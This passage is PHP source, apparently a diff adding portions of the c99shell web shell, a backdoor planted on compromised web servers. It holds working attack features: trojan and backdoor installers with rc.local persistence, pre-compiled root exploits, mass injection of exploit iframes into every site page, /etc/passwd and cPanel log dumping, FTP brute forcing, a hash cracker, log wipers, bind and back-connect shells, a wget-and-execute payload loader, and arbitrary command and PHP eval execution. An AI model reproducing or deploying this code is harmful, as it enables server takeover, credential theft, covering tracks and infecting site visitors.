    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == 'd') +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == 'phpinfo') {@ob_clean(); phpinfo(); c99shexit();} + +if ($act == 'trojan') { +echo 'Install Trojan Server:

    '; + if ($win) { + echo 'Please keep in mind that these are not undetectable trojans. Any decent anti-virus will pick them up, and they take no action to bypass firewalls or routers. Use at your own risk.

    '; +?> +
    +Choose Trojan: + + +
    +'; + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if beast was called +} else { // if not windows +?> +Install Backdoor:

    +
    +Choose Backdoor: + + +
    +
       # ./backhole &
    +   i.e. # mv backhole /some/path/fakemail
    +        # chmod 4770 /path/to/fakemail
    +        # echo "/path/to/fakemail &" >> /etc/rc.d/rc.local
    +        # /path/to/fakemail &
    Blackhole is configured to run under the process name \'apache\' on port 6875.
    '; + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if beast was called + + + } // end if windows/unix +} // end if trojan was called + +if ($act == 'exploits') { +?> +Exploits: +

    +All exploits are pre-compiled. Just follow the directions. +

    +h00lyshit - Local Race Exploit +".'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if h00lyshit was called +?> +

    +raptor_chown - Group Modification Exploit +".'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if raptor_chown was called + + +} // end if exploits is called +if ($act == 'massbrowsersploit') { +?> +Mass Code Injection:

    +Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.

    +
    + + + + + + +
    Dir to inject: <-- default is dir this shell is in
    Code to inject: <-- best bet would be to include an invisible iframe of browser exploits
    +
    +'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
    '; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
    '; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + } else { //end if inputted dir is real -- if not, show an ugly red error + echo ''.$_GET['pathtomass'].' is not available!'; + } // end if inputted dir is real, for real this time +} // end if confirmation to mass sploit is go +} // end if massbrowsersploit is called + +if ($act == 'security') +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); + } + else + { +exec('systeminfo', $wininfo); +?> +
    DOS command: systeminfo
    + +Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,'w')) {echo 'Make File "'.htmlspecialchars($mkfile).'": access denied';} + else {$act = 'f'; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = 'ls';} +} +if ($act == 'encoder') +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; + +?> +
    +

    + + + +
    +
    Search milw0rm for MD5 hash
    +
    +
    Search md5encryption.com for MD5 or SHA1 hash
    +
    +
    Search CsTeam for MD5 hash
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +Wordlist Hash Cracker

    +
    + + +Enter hash: +
    +Wordlist: +
    +Type: +
    +
    +'; + if ($hash == $type(rtrim($word))) { + echo 'Great success! The password is: '.$word.'
    '; + exit; + } + ++$count; + } +} + +} +if ($act == 'fsbuff') +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == 'ls') {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == 'chmod') +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == 'md5file') { +?> +
    MD5 Checksum:

    + +'; +echo "
    '.md5_file($v).''.$v.'

    "; + $act = 'ls'; +} +if ($act == 'sha1file') { +?> +
    SHA1 Checksum:

    + +'; +echo "
    '.sha1_file($v).''.$v.'

    "; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; + $act = 'ls'; +} +if ($act == 'delete') +{ + $delerr = ''; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) + $delerr .= 'Can\'t delete '.htmlspecialchars($v).'
    '; + } + if (!empty($delerr)) + echo 'Deleting with errors:
    '.$delerr; + $act = 'ls'; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +// the wipe logs stuff needs to be before cmd, because it will change the $act if the write is successful +if ($act == 'miglc' || $act == 'zap2') { // *nix cleaners + if (is_writable('.')) { + cf($act, $$act); // 'tis pure innovation of optimization :) + $cmd = './'.$act; // keep this before $act = 'cmd'; + $act = 'cmd'; + $cmd_txt = '1'; + }else{ + echo 'Directory Is Not Writable!
    '; + } +} +if ($act == 'clearlogs') { // windows cleaners + if (is_writable('.')) { + cf($act.'.exe', $$act); + $cmd = $act.'.exe'; + $act = 'cmd'; + $cmd_txt = '1'; + }else{ + echo 'Directory Is Not Writable!
    '; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == 'ls') +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = 'Name'; + $row[] = 'Size'; + $row[] = 'Modify'; + if (!$win) + $row[] = 'Owner/Group'; + $row[] = 'Perms'; + $row[] = 'Action'; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    '; + $countrows = 0; + foreach($table as $row) + { + if ($countrows & 1) { + echo "\r\n"; + } else { + echo "\r\n"; + } + ++$countrows; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo "

    '; + } +} +if ($act == 'tools') +{ +?> + + + +
    :: Bind Functions By r57 ::
    +
    +
    +
    +Bind With Backd00r Burner
    + +
    +
    +
    +
    +Back-Connection +

    +
    Host:> Port:
    +Use:
    +First, run NetCat on your computer using 'nc -l -n -v -p '.
    +Then, click "Connect" once the port is listening. +
    +
    + + + + + +
    :: File Stealer Function Ripped From Tontonq's File Stealer ::
    +
    Safe-Mode Bypass +
    + +
    + + + +
    +
    +
    +
    +
    + + Dosyanin Adresi ? =

    +Nereya Kaydolcak? =

    + +
    +
    +
    +Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...
    "; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "Processes:
    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
